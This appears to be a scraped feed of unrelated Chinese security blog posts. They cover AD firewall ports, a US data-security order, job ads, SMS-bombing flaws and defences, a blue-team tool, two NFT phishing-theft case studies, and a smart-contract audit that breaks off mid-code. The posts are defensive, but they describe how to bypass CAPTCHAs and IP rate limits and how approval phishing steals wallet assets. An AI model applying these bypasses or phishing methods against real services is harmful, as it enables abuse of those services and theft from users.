域成员与域控制器之间的通信涉及多种服务和协议，因此需要开放多个端口以支持身份验证、授权和其他目录访问服务。通常需要在防火墙中开放一些端口，以便域成员与域控制器之间能够正常通信，确保域中的计算机可以进行认证和访问网络资源。

        Active Directory是微软公司开发的一种目录服务，允许管理员管理网络资源，如用户帐户、计算机、打印机和文件夹等，是一个集中的、标准化的系统，同时也可以为网络上的用户和资源分配权限和访问权。Active Directory 使用域控制器来存储所有域用户和机器的信息，也可以用来查找和管理资源。域成员与域控制器之间的通信涉及多种服务和协议，因此需要开放多个端口以支持身份验证、授权和其他目录访问服务。通常需要在防火墙中开放一些端口，以便域成员与域控制器之间能够正常通信，确保域中的计算机可以进行认证和访问网络资源。不过，具体需要开放哪些端口可能取决于网络的配置以及在域控制器和域成员服务器上部署的服务。在配置防火墙和安全策略时，应根据实际需要来调整端口的开放。

阅读原文

跳转微信打开

拜登签署总统行政令，在数据安全方面的影响主要体现在加强敏感个人数据的保护、规制大规模数据转移、打击数据交易、推动数据安全立法、金融业数据保护、跨国数据传输限制几个方面。在进行跨境数据相关业务活动时，需要更加谨慎，例如安全测试、代码审计等。

• 司法部颁布法规，明确保护美国人的敏感个人数据不被受关切国家获取和利用。这些保护措施将扩展到基因组数据、生物识别数据、个人健康数据、地理位置数据、财务数据和某些类别的个人识别信息。这些措施将防止此类数据被大规模转移到受关切国家，而这些国家都有采集和滥用美国人数据的不良记录。
• 司法部发布法规，对敏感的、与政府相关的数据，其中包括敏感政府网站的地理位置信息和军人信息，建立更严格的保护。
• 司法部和国土安全部合作制定安全高标准，防止通过其他商业手段（如通过投资、供应商和雇佣关系所获得的数据）来获取个人数据。
• 卫生与公众服务部、国防部和退伍军人事务部共同确保联邦拨款、合同和奖励机制不被受关切国家利用以便于获取美国人的敏感健康数据，其中包括通过利用设在美国的公司企业。
• 外国参与美国电信服务行业评估委员会在审核海底电缆许可证时要考虑到对美国人的敏感个人数据的威胁。
• 这些行动不会阻止金融服务活动所需的信息流动，政府也不会采取旨在使美国与其他国家的大量消费、经济、科学和贸易关系在更大范围内脱钩的措施。

https://www.whitehouse.gov/briefing-room/statements-releases/2024/02/28/fact-sheet-president-biden-issues-sweeping-executive-order-to-protect-americans-sensitive-personal-data/

阅读原文

跳转微信打开

【岗位名称】

网络安全研究员

【岗位职责】

1.参与建设大数据安全分析平台的核心分析能力。

2.模拟威胁环境，构建安全分析模型，提升产品溯源能力。

3.跟踪最新威胁，带领团队完成应对新威胁的功能改进。

4.利用态势感知平台支持客户现场的安全分析。

【任职要求】

1.有红蓝对抗、病毒分析方面的经验和背景，3年以上相关经验。

2.有安全产品研发经验，不限于网络安全产品和终端安全产品。

3.了解典型的网络安全模型，比如杀伤链模型、ATT&CK框架等。

4.熟悉下述一种编程语言: 解释性语言 (Python或Perl) 、网络语言 Java或PHP) 、编译语言 (C或C++)。

5.有态势感知产品经验、有日志分析和流量分析相关经验者优先。

6.具备较强的动手能力和客户沟通能力。

【工作地点】北京-亦庄

【薪资范围】面议（20-25k，优秀可谈）

【招聘名额】1人

【简历投递】zhang.sw@asiainfo-sec.com

【岗位名称】

网络安全分析师

【岗位职责】

1.设计和验证安全分析模型和规则，提高态势感知平台的检测、溯源和处置能力。

2.提高产品的安全告警研判能力，优化安全分析规则，降低误报率。

3.参与客户环境中态势感知平台的规则调优、事件分析和日常运营工作。

4.参与建设大数据安全分析平台的核心分析能力。

【任职要求】

1.有网络攻防、渗透测试的经验和背景，3年以上相关经验。

2.熟悉网络安全产品的实践和原理，如防火墙、IDS、杀毒软件。

3.具有威胁分析工具使用经验，比如WiresharkIDA Pro，OllyDbg.Metasploit等。

4.熟悉下述一种编程语言: 解释性语言 Pvthon或Perl) 、网络语言(ava或PHP) 、编译语言 (C或C++)。

5.有日志分析和流量分析相关经验者优先6.具备较强的动手能力和客户沟通能力。

【工作地点】北京-亦庄

【薪资范围】面议（20-25k，优秀可谈）

【招聘名额】1人

【简历投递】zhang.sw@asiainfo-sec.com

相信每个渗透测试工程师在工作中会常常挖掘到短信轰炸漏洞，同时在测试过程中也会遇到一个疑问，一是如何设置短信发送数量的阈值，二是如何设置时间的阈值，简而言之，在多长时间内发送多少条短信才能认定是短信轰炸漏洞。

一、漏洞原理

       在绝大部分网站中，都提供短信来进行用户验证，如注册、登录、修改密码、转账等功能，通过短信可以简单便捷地进行用户验证。

       但是，如果验证逻辑存在缺陷，导致用户可以无限制请求短信接口，就会造成短信轰炸漏洞，也属于防护功能滥用类漏洞。该漏洞的利用过程也比较简单，即伪装成正常用户，向短信接口发起大量的请求，即可完成攻击过程。短信轰炸漏洞也能造成不小的危害，如会造成短信通道阻塞、短信资源被恶意消耗，如果被灰黑产利用，制作成短信轰炸机，还会造成企业形象受损，若被用户投诉还可能造成接口封禁等威胁。

二、实际问题

       相信每个渗透测试工程师在工作中会常常挖掘到短信轰炸漏洞，同时在测试过程中也会遇到一个疑问，一是如何设置短信发送数量的阈值，二是如何设置时间的阈值，简而言之，在多长时间内发送多少条短信才能认定是短信轰炸漏洞。为什么会有这个疑问呢，其实跟实际的工作非常贴合。首先，作为网络安全公司的工程师，目的是为企业提供更好的服务，创造价值。其次，作为监管方，要履行应有的职责，多数情况下也会采纳安全厂商的建议。最后，作为被监管方，要保障业务的安全稳定运行。那么，当一个漏洞的判定标准不同时，就会引发额外的沟通成本。查阅一些相关的资料，重新理解了短信轰炸漏洞的定义。选取具有代表性的互联网公司的安全应急响应中心的安全漏洞及威胁情报处理规范，调研结果如下：

1. 腾讯安全应急响应中心，无限制短信轰炸漏洞；

2. 字节跳动安全应急响应中心，短信轰炸需要能够绕过已有风控策略，造成短时间高强度（5分钟内连续发送50条以上）对同一号码进行轰炸。横向短信轰炸（对不同手机号码发送短信）不收取；

3. 百度安全应急响应中心，普通逻辑设计缺陷。包括但不限于无限制短信邮件等发送等，《百度安全响应中心漏洞奖励处理细节V2.0》；

4. 阿里安全响应中心，轻微的设计缺陷漏洞，如对单个手机的无限短信轰炸漏洞；

5. 快看安全应急响应中心，单一 IP/用户半小时内定向发送超过 50 条短信后无任何限制，利用短信接口无限制向不同手机发送单条短信的行为将被忽略。

       综上所述，对于短信轰炸漏洞的定义是在短信发送数量上至少能够连续发送50条以上，那么在时间上是没有明确的标准，欢迎各路大神提供有价值的参考材料。

三、防御思路

       短信轰炸漏洞造成的原因大概可以总结为两个，一是没有验证用户是否为正常用户，二是没有限制短信下发的频率，而防御思路也可以根据这两个方面来展开。针对于用户校验方面，可以通过在发送短信验证之前，增加图形验证码或者是滑块验证码。而短信下发频率方面，可以限制单个IP请求频率、限制单个手机号请求频率等等。参考《基金管理公司移动互联网应用程序技术规范》对短信验证码问题提出了几点要求：

1. 应确保手机号的真实性得到验证，用户修改手机号应进行严格的身份验证；

2. 短信验证码发送时，应包含相关业务信息，说明短信验证码用途；

3. 应为短信验证码设置合理的有效期；

4. 短信验证码应随机产生，且长度不小于4位；

5. 短信验证码的使用应遵循一码一用的原则，不允许被重复使用，不允许跨业务跨订单使用；

6. 短信验证码短信的内容不应由用户定制；

7. 需要短信验证码的业务场景，应充分论证其业务的必要性，避免造成短信轰炸。

3.1 图形验证码

       造成短信轰炸漏洞的主要原因是攻击者可以编写成自动利用脚本工具，对短信接口进行大量的调用。如果在获取短信验证码前，增加一个图形验证码，只有校验成功才能进行后续操作，也能有效地防御漏洞。如果图形验证码功能增加的逻辑不当，仍然会造成短信轰炸漏洞：

1. 前端验证，图形验证码必须在服务端生成和校验；

2. 验证码复用，验证码必须单次有效，有合理的失效机制；

3. 图形过于简单，可以使用OCR进行图形识别，验证作用也就不复存在了，可以使用需要逻辑判断的图形验证码，如简单的算式等等，都可以增加攻击者自动化攻击的成本。

3.2 滑动验证

       相对于简单的图片验证码，滑动验证的方式不仅用户体验会更好，安全性也会更高，因为滑动验证的本质逻辑是用户的拖放轨迹是否符合真实用户的行为特征。但是，滑动验证也并不是完全不可绕过， 在Github 上有不少利用深度学习进行滑动验证项目。其工作原理是，通过对大量的样本数据进行数据标注，即将滑块的位置标注，用目标识别的模型，预测出滑块位置，最后通过轨迹方程，完成滑块验证。同时，滑动验证也需要规范使用的逻辑，如有效性控制，包括了有效时间和有效次数等等。

3.3 限制单个IP请求频率

       通过限制IP在单位时间内的请求次数，可以有效阻止某个IP在短时间内对大量用户进行轰炸攻击。一旦用户请求次数超出设定的阈值，则暂停对该IP一段时间内的请求进行响应；若造成大量的恶意请求，也可以将IP加入黑名单，禁止该 IP 的访问请求。然而，通过IP限制的方式，仅仅是增加了攻击成本而已。单一的IP限制很难达到比较好的防御效果，攻击者可以使用代理池等对IP限制进行绕过。

3.4 限制单个手机号请求频率

       可以根据业务需求，对手机号在单位时间内的请求次数进行限制，如一天不超过十次等。同时，还需要对两次请求之间的时长做合理限制，时长应该要超过验证码有效期。通过这样的限制，可以有效地解决单个用户遭受短信轰炸的困扰。但是，仅仅通过限制单个手机号的请求频率，依然无法解决所有问题。这样的防御方案仅仅防止了短信轰炸问题，但是攻击者依然可以通过生成随机手机号，对随机用户发送短信，虽然这样的攻击并不会造成轰炸的效果，但是依然会损耗短信资源，造成一定的损失。

阅读原文

跳转微信打开

大家好，ABC_123大佬的公众号正式更名为”希潭实验室”，ABC_123坚持99%原创，敬请关注。

 Part1 前言 

大家好，我是ABC_123，公众号正式更名为”希潭实验室”，ABC_123坚持99%原创，敬请关注。年前写了这么一款蓝队分析辅助工具箱，看到很多朋友都在使用，于是我也抽出时间把很多功能进行了优化和更新。“蓝队分析辅助工具箱”就是把我平时写的蓝队小工具集合起来形成的，重点解决蓝队分析工作中的一些痛点问题。本次更新重点解决热心网友反馈的一些问题，解决了长时间让ABC_123非常头痛的Java Swing软件界面美化问题。

注：1、软件路径不能包含中文。2、Mac系统下复制粘贴请使用Command+V、Ctrl+V、Alt+V等快捷键进行尝试。

 Part2 使用说明及功能介绍 

• 端口连接添加ip归属地址|对国外IP高亮显示

假设甲方客户的内网主机中了恶意病毒，蓝队人员通常会执行netstat -an命令去查看每个端口或者进程连接国外ip地址情况。将netstat -an结果贴到工具中，点击“查询ip对应物理地址”按钮，程序就会在每一行结果后面，添加上每个ip地址对应的国家、城市、经纬度、国外大学等物理地址，方便蓝队人员快速定位出存疑的ip、端口、进程，而且此功能无需联网使用，断网情况下仍然可以用。本次更新优化了查询速度，基本上秒出结果，同时对国外的IP地址进行了标黄处理，方便查看。

• Java反序列化数据包分析功能

此功能可以直接对java反序列化数据包进行解包分析，参考了SerializationDumper工具的代码。

• 冰蝎及哥斯拉webshell流量解密功能

编写这个功能耗费了我很大的精力，对于冰蝎webshell，从流量中找到秘钥即可解密。对于哥斯拉webshell，目前只支持java型webshell流量解密，其它功能后续再加上。由于哥斯拉低版本的1.x-2.x与3.x-4.x版本的流量加密过程稍微有点不一样，因此解密功能分开写了。暂不支持冰蝎4.x的解密，后续会加上。

如下图所示，可以清晰看到攻击者具体进行了哪些操作，方便大家在编写蓝队分析报告，直观地将危害性反馈给甲方客户。

• 新增5种Java内存马class文件反编译功能

通过调用Intellij Idea、CFR、Procyon、JD-Core、JDK等5种反编译工具接口，分别对Base64加密的class文件、转成Byte数组的class文件、BECL编码的class文件、Base64编码+Gzip编码的class文件、原版class文件反编译成java代码，方便蓝队人员分析异常流量中的内存马代码。

当然，此功能对于红队人员也特别方便，方便大家编写tomcat、springboot、weblogic内存马时进行class文件反编译对比分析。

 1  如下图示所示，程序对Base64加密的内存马class文件进行反编译分析。

 2  如下图示所示，程序对Byte数组的内存马class文件进行反编译分析。

 3  如下图示所示，程序对BECL编码加密的内存马class文件进行分析。

 4  如下图示所示，程序对Base64+Gzip压缩的内存马class文件进行反编译分析。

 5  如下图示所示，程序对class文件进行反编译分析。

• 在Jar包中搜索指定类名

对于蓝队人员，此功能可以在指定的jar包目录中筛选出含有恶意类名的jar包文件，现在很多红队人员制作的不死内存马，会将jar包中的class文件修改掉，关机重启后内存马仍然可用，那么这个分析功能会非常有用。

对于红队人员，在编写调试0day或者Nday的POC时，比如说weblogic中间件，它所包含的依赖jar包可能有上千个，查找存在漏洞的类究竟依赖于哪个jar包是非常头痛的一件事，这个工具可以帮您解决这个问题。在编写调试weblogic的poc时，ABC_123就是使用这个功能查找指定jar包依赖的。

• 解密Shiro数据包/CAS数据包/Log4j2数据包功能

对于设备告警的Shiro反序列化攻击行为，部分蓝队分析人员，对Shiro反序列化攻击做不了研判工作，难以辨别是否是攻击行为，还是正常的业务行为，还是设备误报。于是我在解密数据包的同时，加入了数据包分析功能，可以快速研判是否有反序列化攻击行为。

如下图所示，该功能可以手工指定key对shiro数据包进行分析。

该功能可以解密日常遇到的攻击者用于绕过waf的加密混淆的log4j2的payload，通过此功能，蓝队分析人员可以得到攻击者的一个外网ip地址。如果遇到解不了的payload，记得公众号给我留言。

部分设备遇到CAS数据包就会告警，蓝队人员又无法确定是否是误报，本功能就是为了解决这个问题而写的，使用CAS默认秘钥对数据包进行解密，解密后就可以判断出是否是反序列化攻击了。

• 编码/解码工具

在蓝队分析工作中，不少朋友反映没有一款好用的编码/解码工具，不是功能有bug，就是功能不全。比如说最简单的URL编码、16进制的Hex编码、Base64编码，很多工具就没有考虑到中文字符的GB2312、UTF-8编码问题，导致解密结果不正确或者是乱码。于是我仔细研读了网上的关于编码/解码的文章，对常用的编码/解码功能进行调试，写成了如下功能。看后续大家反馈，如果好用的话，我可以把“编码/解码”功能单独拎出来写一个工具，主要功能如下。

 1   更改软件界面，加入GB2312、UTF-8、GBK、BIG5、ISO-8859-1、GB18030等编码库，解决中文汉字在编码解码过程中产生的乱码问题。

 2   将“becl编码文件功能”中的becl编码类更换为“回忆飘如雪”师傅编写的Java类，解决部分JDK由于缺失相应的class文件而无法Becl编码的问题。

 3   新增“Hex编码二进制文件”功能，可以将二进制文件编码成16进制格式。

 4   将Base64编码功能统一更换为第三方jar包，使其通用性更强。

 5   支持将二进制文件转为byte数组格式。

同时还可以对二进制文件进行base64编码、hex16进制编码、BECL编码、转为byte数组等操作。

关注公众号"希潭实验室”，回复数字“0416”，即可得到此蓝队辅助工具箱V0.52的下载地址。

 Part3 总结 

1.  后续还会继续更新这个工具，有好的建议可以在公众号后台给我留言。

2.  冰蝎4.x、哥斯拉数据包解密功能，后续有时间会更新。

3.  后续会加入一些威胁情报检索功能，敬请关注。

4.  关注公众号回复“2022”，即可得到“2022年ABC123公众号年刊”的PDF电子书下载地址。

第51篇：某运营商外网打点到内网横向渗透的全过程

第46篇：伊朗APT组织入侵美国政府内网全过程揭秘（上篇）

第19篇：关于近期cs服务端被反打的原因分析

公众号专注于网络安全技术分享，包括APT事件分析、红队攻防、蓝队分析、渗透测试、代码审计等，每周一篇，99%原创，敬请关注。

Contact me: 0day123abc#gmail.com(replace # with @)

欢迎来到我们的微信公众号，我们现在接入了ChatGPT，由AI驱动的语言模型，可以提供自然语言处理的服务，与您进行对话式交互。尝试问我任何问题，我将尽力提供准确和有用的答案，帮助您更好地理解和解决问题。

提醒⚠️近日有大量快递信息泄露，涉及几乎每一个人，请各位提醒家人及朋友谨慎防范陌生来电各种理由的诈骗、推销。

跳转微信打开

祝各位同学2023年🧨🧨🧨

阖家欢乐，吉祥如意🧧🧧🧧

幸福安康，💗年快乐🎆🎇🎆

Discord钓鱼攻击案例分析及安全建议

背景信息

2022 年 7 月 14 号，团队成员监测到 NiceLabs 发行的 NFT 项目 NICE OFFICIAL 所在 Discord 出现了管理员账户被攻击的情况，待攻击发生后，攻击者利用管理员账户发布了钓鱼链接，诱导点击钓鱼链接社区成员授权其 NFT 转账权限给某特定攻击者私人地址，对用户资产安全造成了严重威胁。NICE OFFICIAL 在 Opensea 平台的介绍预览页面如下所示：

攻击时间线分析

这是一起攻击者通过技术手段控制 Discord 服务器管理员账户，对全服务器禁言后，利用 announcements 频道发布钓鱼信息导致的一起攻击事件。

6点21分左右，攻击者禁言服务器发言功能:

6点26分，攻击者发布空投钓鱼链接：

钓鱼链接见下图，为了您的资产安全建议不要点击或连接资产钱包

6点28分，第一笔 NFT 资产被盗：

UTC 时间 7月13日 22点28分05秒，为北京时间7月14日6点28分左右

攻击账户分析

为确保分析的时效性，我们将选取特定账户进行分析，且仅对单个受害人进行分析，为了便于读者阅读和理解，特对相关账户进行命名：

- 受害账户:

0xbF63297B5BbD44ec4FF661215af9F678134b0B5e

- 攻击账户（通过钓鱼获得受害者授权转账特定 NFT 资产权限）:

0x1CAE8eE3F829F260cB9881A62c3FBC5B77331A42

- 获利账户（与攻击账户相同）:

0x1CAE8eE3F829F260cB9881A62c3FBC5B77331A42

攻击情况分析：

1.攻击者诱导受害账户调用 setApprovalForAll 方法授权攻击账户具备转账受害账户 Secret Island Club 的交易链接：

https://etherscan.io/tx/0x33f6438efc42625d64c0a706b4d25adc3aeca6a69e16ea8db887f375b5b085d9

对输入数据进行解码，授权攻击者操作受害账户 Secret Island Club 资产的操作将显得更加直观，交易发出后，攻击者即具备了转账受害账户 Secret Island Club NFT 资产的权限。

2.攻击者调用 Secret Island Club NFT 合约转转账受害账户 Secret Island Club 资产的交易链接：

https://etherscan.io/tx/0xdb1ef86ff503ce947daf4bb038de5c7a649574be89e4141cffceb504079f6133

通过下图不难发现，此时智能合约的调用者已经变成了攻击账户，调用 transferFrom函数将受害账户资产转移至攻击账户中：

通过解码交易数据能够更直观的分析交易详情：

攻击后果：

攻击者账户中囤积了大量地板价超过 0.2ETH 的 NFT 资产

安全建议：

1. Discord 管理员需开启双因子认证机制。

2. 认清官方网站，避免点击不明链接，在遇到问题时，找其他人核实和对证，一定程度能规避这一风险。

3.优先选择 Linktree 服务，在一定程度上能够进入正确的网址并与网络进行交互。

4. 关闭 Discord 服务器私聊功能，避免恶意的 DM 操作。

阅读原文

跳转微信打开

Uniswap丢币与钓鱼攻击

背景信息

2022 年 7 月 12 号，清晨 CZ 的推特发布讯息，称其安全团队监测到 Uniswap 出现大额丢币事件，且攻击者获利的 ETH 已流入 Tornado Cash 。经过链上数据整理和分析，能够发现这是一起攻击者利用钓鱼攻击使受害者在钓鱼环境下调用 approve 授权函数，将受害者持有 Uniswap 721 LP NFT 授权给特定账户，进而导致的攻击。该攻击造成了超过 4295 个 ETH 被窃取。

随后 Uniswap 团队回应，此次攻击为钓鱼攻击，在攻击者不掌握受害者钱包账户私钥的前提下，使用哪种办法能够使其获得受害人的资产，进而使其遭受损失呢？这与 setApprovalForAll 及 approve 函数本身存在的潜在 spend 风险，和用户对这一函数所带来的潜在风险认识不到位存在一定关系。另外也不排除钓鱼站点做的足够逼真，以至于让用户忽略了同源策略直接授权。

攻击账户信息

为确保分析的时效性，我们将选取特定账户进行分析，且仅对单个受害人进行分析，为了便于读者阅读和理解，特对相关账户进行命名：

• 受害账户:

  0x15c853bdafc9132544a10ed222aeab1f239414fe

  

• 攻击账户（经授权具备转移受害账户 Uniswap NFT 能力的账户）: 

  0x3CAFc86a98B77EeDcD3db0ee0aE562D7fe1897A2

  
  

  

• 洗币账户（也可以理解为攻击的实际获利账户）:

  0x09b5027eF3a3b7332EE90321E558baD9C4447AFA

  

攻击信息分析

1.攻击者诱导受害账户调用 setApprovalForAll 方法授权攻击账户的交易链接：

https://etherscan.io/tx/0x1f5d7e647723f542abda34e83bdeb5c8dcbae08777efc2d4aac219ae113a87d4

通过分析发现受害账户与 Uniswap 的 LP 合约进行了交互，且调用 setApprovalForAll 方法授权自己的 NFT 给攻击账户，交易详情如下：

此时，攻击账户就具备了操作受害账户中 Uniswap V3 NFT 的能力（其实每一次在 Opensea 上交易 NFT 都需要调用 setApprovalForAll 方法）

2.攻击账户操作 Uniswap V3 NFT 合约将受害者账户中的 LP NFT 转移至洗币账户的交易链接：

https://etherscan.io/tx/0x8f3040fe5ab4ddfa8b984edbab863295ae3e191d23cda0b8525f5e79c8774cbc

不难发现，攻击账户在通过钓鱼获得受害账户的授权后，直接向 Uniswap V3 NFT 合约发送转移请求，即将受害账户持有的 LP NFT 转移至洗币账户，此时洗币账户将获得被盗取的 LP ，通过移除 LP 操作，即可获得 ETH 。

3.洗币账户利用 Tornado Cash 进行洗币的交易链接：

https://etherscan.io/tx/0xe902c988da5e715c932f11df56a837e4599df5c695a8fa3d96b902e9f5cfe0d6

阅读原文

跳转微信打开

数字藏品合成公告，合约审计及安全问题探讨

免责声明：本文不构成任何投资建议，文中所涉及的技术及相关安全问题仅代表笔者观点,不具有任何指导和买卖意见。市场有风险,投资需谨慎!识别出的潜在安全问题，并不代表该合约在实际环境中就确实存在安全问题，识别出的风险点仅作为安全建议进行参考。

一、故事背景：数字藏品的自动合成及销毁

截图如下所示，通读说明可以提取如下关键字样：

（1）普通款藏品已经合成即“自动销毁”，隐藏款合成后，将仍会保存；

（2）合成是自动完成的：也就是说可以在持有者无感的情况下，自动持有者的普通藏品销毁，保留隐藏款，并向成功合成的用户 transfer 一个合成后的数字藏品。

二、安全问题：钱包资产的安全

考虑到，在不掌握私钥的情况下，除私钥持有人外，任何区块链账户都不具备直接销毁用户资产的能力。因此，如果需要具备自动合成及销毁普通款藏品的能力，需要开发者在数字藏品的合约代码处添加相关逻辑：

    （1）记录钱包内普通款藏品数据；

    （2）对钱包内隐藏款藏品进行记录；

    （3）调用 NFT 合约中提供的 burn 方法，将普通款藏品销毁；

    （4）调用 NFT 合约中提供的 mint 方法，将 “合成” 的藏品发行，并转移至合成成功的用户钱包处。

当上述逻辑执行完成后，用户钱包内的资产将变为合成藏品（从零地址mint 出来并转移至用户钱包），而普通款藏品将消失（由于 burn 至零地址），隐藏款藏品保留（说明代码逻辑不会对隐藏款藏品调用 burn 方法）。这样，开发者就可以在不需要账户私钥的情况下，完成这一操作。

从安全的角度来看，这一逻辑可以理解为是一种安全可控的后门：在特定情况下触发，执行敏感操作（调用 burn 方法销毁一部分资产，调用 mint 方法增发合成后的数字藏品），在不滥用和误用的前提下，用户资产是安全的。Code is Law，只要用户账户里存在15个或以上的普通藏品及2个或以上的隐藏款藏品，代码即默认认为用户愿意参与销毁15个普通藏品，消耗2个隐藏款藏品，并以此兑换一个合成后的数字资产的合成活动。

三、交易行为分析：

区块链操作是不可篡改的，且所有的链上交互都是公开可查的，因此我们选取了一笔“合成”交易，进行行为分析。

合成操作对应的交易数据：

调用智能合约的输入数据经解码为 JSON 格式数据处理后如下所示：

需要读者提前知晓的知识：（1）普通款数字藏品为图片格式；（2）隐藏款数字藏品为视频格式；（3）Conflux 网络有一套自有的地址转义规则，具体可参考如下链接：

                                https://www.confluxscan.net/address-converter

{    "name": "chill__exchange",    "fullName": "chill__exchange((address,uint256[],uint256[])[] infos, uint256 numImagesForReward, uint256 numVideosForReward)",    "type": "chill__exchange((address,uint256[],uint256[])[],uint256,uint256)",    "signature": "0xd8722bd1",    "array": [        [            [                "0x1fbe2923d9e514d20b049cfb02e7f0c7e6ea3e81",                [                    "456",                    "733",                    "2194",                    "2950",                    "3900",                    "4048",                    "4273",                    "4317",                    "4784",                    "5201",                    "5231",                    "5436",                    "5475",                    "6162",                    "6389",                    "6728",                    "6833"                ],                [                    "7325",                    "7898"                ]            ],            [                "0x18d5eaf71aa697583c0e64fe49f2c8a29cd161f6",                [                    "474",                    "799",                    "1126",                    "1583",                    "2300",                    "2478",                    "3292",                    "3342",                    "4013",                    "4016",                    "5003",                    "5177",                    "5257",                    "5813",                    "6016"                ],                [                    "7298",                    "7305"                ]            ],            [                "0x18b1edd5ae736ff9338f09d456499bef420dff04",                [                    "478",                    "569",                    "1217",                    "1757",                    "2411",                    "2777",                    "3291",                    "4731",                    "6017",                    "6095",                    "6413",                    "6422",                    "6805",                    "7086",                    "7190"                ],                [                    "7237",                    "7495"                ]            ]        ],        "15",        "2"    ],    "object": {        "infos": [            [                "0x1fbe2923d9e514d20b049cfb02e7f0c7e6ea3e81",                [                    "456",                    "733",                    "2194",                    "2950",                    "3900",                    "4048",                    "4273",                    "4317",                    "4784",                    "5201",                    "5231",                    "5436",                    "5475",                    "6162",                    "6389",                    "6728",                    "6833"                ],                [                    "7325",                    "7898"                ]            ],            [                "0x18d5eaf71aa697583c0e64fe49f2c8a29cd161f6",                [                    "474",                    "799",                    "1126",                    "1583",                    "2300",                    "2478",                    "3292",                    "3342",                    "4013",                    "4016",                    "5003",                    "5177",                    "5257",                    "5813",                    "6016"                ],                [                    "7298",                    "7305"                ]            ],            [                "0x18b1edd5ae736ff9338f09d456499bef420dff04",                [                    "478",                    "569",                    "1217",                    "1757",                    "2411",                    "2777",                    "3291",                    "4731",                    "6017",                    "6095",                    "6413",                    "6422",                    "6805",                    "7086",                    "7190"                ],                [                    "7237",                    "7495"                ]            ]        ],        "numImagesForReward": "15",        "numVideosForReward": "2"    }}

不难发现，cfx:aatgvya99cctj5kx0agh4b18czbav2m80adsrny7ah 账户通过发送交易调用了智能合约提供的 chill__exchange 方法。该方法对应的方法 ID 为 0xd8722bd1 。调用该方法需要指定参数列表：(address,uint256[],uint256[])[] infos, uint256 numImagesForReward, uint256 numVideosForReward)，参数列表中包含 address 类型变量及两个 uint256 类型变量组成的二维数组 infos, uint256 类型变量 numImagesForReward 以及 uint256 类型变量 numVideosForReward。

通过后续阅读代码：能够理解传入的参数内容，以 0x 开头的账户，即为待进行合成操作的地址：0x18b1edd5ae736ff9338f09d456499bef420dff04。478,569,1217,...,7190 为普通款数字藏品对应的 ID 编号。7237,7495 为隐藏款数字藏品对应的 ID 编号。numImagesForReward 参数 15 则代表合成需要的普通款数字藏品数量为15，numVideosForReward 参数为 2 则代表合成需要的隐藏款数字藏品数量为2。（很重要，与最后合成时的 while 循环条件有关）

0x18b1edd5ae736ff9338f09d456499bef420dff04 对应的 Conflux 网络地址为

cfx:aapnd5szz33098kxv6e7jzwkxt1yedt9auc0hfr4nk

四、代码行为分析：

在第三部分，我们已经找到了智能合约的调用者及智能合约信息，可以直接对智能合约代码进行分析。经过区块浏览器查找，发现智能合约使用了OpenZeppelin's Unstructured Storage 代理模式，实际的调用合约为：

https://www.confluxscan.net/address/cfx:acakr6tw7tmd8w4vwsbswh42xyv31vjy1ubm802u1f

页面显示信息如下：

合约源码以进行验证，示意图如下：

合成关键代码如下：

modifier onlyMinter() {      require(hasRole(MINTER_ROLE, msg.sender), "DIO: Unauthorized");      _;  }function chill__start(uint256 tokenId) public onlyMinter {        chill__inProgress = true;        chill__nextRewardId = tokenId;    }
    function chill__end() public onlyMinter {        chill__inProgress = false;    }
    function chill__exchange(        ExchangeInfo calldata info,        uint256 numImagesForReward,        uint256 numVideosForReward) public onlyMinter {        require(chill__inProgress, "Not started yet");
        // prepare valid images and videos        uint256[] memory images = new uint256[](info.images.length);        uint256[] memory videos = new uint256[](info.videos.length);
        uint256 numImages = 0;        uint256 numVideos = 0;
        for (uint256 ii = 0; ii < info.images.length; ++ii) {            uint256 tokenId = info.images[ii];
            if (ownerOf(tokenId) == info.user) {                images[numImages++] = tokenId;            }        }
        for (uint256 ii = 0; ii < info.videos.length; ++ii) {            uint256 tokenId = info.videos[ii];
            if (ownerOf(tokenId) == info.user && !chill__videoUsed[tokenId]) {                videos[numVideos++] = tokenId;            }        }
        // process        uint256 imageId = 0;        uint256 videoId = 0;
        while ((numImages - imageId) >= numImagesForReward && (numVideos - videoId) >= numVideosForReward) {            // burn images            for (uint256 ii = 0; ii < numImagesForReward; ++ii) {                uint256 tokenId = images[imageId++];                _burn(tokenId);            }
            // skip videos            for (uint256 ii = 0; ii < numVideosForReward; ++ii) {                uint256 tokenId = videos[videoId++];                chill__videoUsed[tokenId] = true;            }
            // send out reward            emit ChillExchange(info.user, chill__nextRewardId);            this.transferFrom(address(this), info.user, chill__nextRewardId++);
        }    }

一段一段来，谁也跑不了，首先是 modifier 修饰符，用于修饰合约函数，确保调用合约方法的账户必须具备 MINTER_ROLE 角色。

function chill__start(uint256 tokenId) public onlyMinter {        chill__inProgress = true;        chill__nextRewardId = tokenId;    }
    function chill__end() public onlyMinter {        chill__inProgress = false;    }

上述代码不难看出，调用 chill__start 方法，需要交易发起人具备 MINTER_ROLE 角色。调用 chill__end 方法，同样需要交易发起人具备 MINTER_ROLE 角色。chill__start 方法会将chill__inProgress 状态变量设置为 true，状态位设为 true ，说明要开始进行合成操作了。当合成活动结束后 minter 还需要调用 chill__end 方法。指定 chill__nextRewardId 为调用者传入的参数 tokenId。

minter 调用 chill_start 方法交易详情如下所示：

https://www.confluxscan.net/transaction/0xeed45d94a38119db44cd4775203431c962a90bd26ca8a0fd7ff65677ca0288e7

经检查，minter 地址为 cfx:aatgvya99cctj5kx0agh4b18czbav2m80adsrny7ah，调用数据如下图所示，发现调用时传入的 tokenId 为 8002，大胆推测第一个合成成功的用户获得的 NFT 编号为 8002：

在合成前，智能合约需要处理用户账户中存储的数字藏品，关键代码如下：

      require(chill__inProgress, "Not started yet");
      // prepare valid images and videos      uint256[] memory images = new uint256[](info.images.length);      uint256[] memory videos = new uint256[](info.videos.length);
      uint256 numImages = 0;      uint256 numVideos = 0;
      for (uint256 ii = 0; ii < info.images.length; ++ii) {          uint256 tokenId = info.images[ii];
          if (ownerOf(tokenId) == info.user) {              images[numImages++] = tokenId;          }      }
      for (uint256 ii = 0; ii < info.videos.length; ++ii) {          uint256 tokenId = info.videos[ii];
          if (ownerOf(tokenId) == info.user && !chill__videoUsed[tokenId]) {              videos[numVideos++] = tokenId;          }      }

require(chill__inProgress, "Not started yet") 调用用于检测状态变量 chill__inProgress 是否为 true （取决于 minter 是否已经调用了 chill__start 方法）

uint256[] memory images = new uint256[](info.images.length);uint256[] memory videos = new uint256[](info.videos.length);

上述代码是初始化一段数组，数组的长度取决于 minter 调用合约是传入的参数长度，通常info.images.length 为 15 ，info.videos.lengh 为 2。

uint256 numImages = 0;uint256 numVideos = 0;
